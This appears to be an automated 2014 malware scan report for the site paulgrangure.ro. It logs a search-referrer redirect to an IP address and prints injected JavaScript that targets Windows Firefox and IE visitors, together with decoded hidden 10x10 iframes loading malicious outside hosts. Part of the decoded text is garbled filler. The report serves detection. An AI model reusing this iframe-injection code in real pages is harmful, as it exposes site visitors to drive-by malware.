Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://paulgrangure.ro/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: paulgrangure.ro Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 07 Jul 2014 02:33:56 GMT Location: http://195.242.161.162/stats/priemIframe.php Server: Apache Content-Length: 252 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://paulgrangure.ro/ | 200 OK Content-Length: 27092 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function get_cookie(Name) { var search = Name + "="; var returnvalue = ""; if (document.cookie.length > 0) { offset = document.cookie.indexOf(search); if (offset != -1) { offset += search.length; end = document.cookie.indexOf(";", offset); if (end == -1) end = document.cookie.length; returnvalue=unescape(document.cookie.substring(offset, end)); } } return returnvalue;}function set_cookie(name, value) { var cxdate = new Date(); cxdate.setYear(2024); cxdate.setMonth(3); cxdate.setDate(3); document.cookie = name + '=' + escape(value) + ';expires=' + cxdate.toGMTString() + ';path=/';}var br_reg = /(Firefox|MSIE)/i;var usr_os = navigator.userAgent;if(get_cookie('toppedup') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg)) { document.write(''); set_cookie('toppedup', '1010101');} Decoded script: asdas asdas n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] <iframe src='http://mindphuc.cu.cc/showthread.php?t=86171563' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
Hidden iFrame found. size: 10x10 style: hidden src: http://standby.fm/bands/filtr1.php?hashftp=ca6376133096ceb63056033ff9f6ff24&hashpage=d1546d731a9f30cc80127d57142a482b <iframe src="http://standby.fm/bands/filtr1.php?hashftp=ca6376133096ceb63056033ff9f6ff24&hashpage=d1546d731a9f30cc80127d57142a482b" width=10 border=1 height=10 style="visibility:hidden"> | ||
http://paulgrangure.ro/test404page.js | HTTP/1.1 302 Found Connection: close Date: Mon, 07 Jul 2014 02:34:02 GMT Location: http://195.242.161.162/stats/priemIframe.php Server: Apache Content-Length: 228 Content-Type: text/html; charset=iso-8859-1 | clean |
http://195.242.161.162/stats/priemiframe.php | 404 Not Found Content-Length: 299 Content-Type: text/html | clean |
http://195.242.161.162/test404page.js | 404 Not Found Content-Length: 292 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=paulgrangure.ro
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://paulgrangure.ro/
Result: paulgrangure.ro is not infected or malware details are not published yet.
Result: paulgrangure.ro is not infected or malware details are not published yet.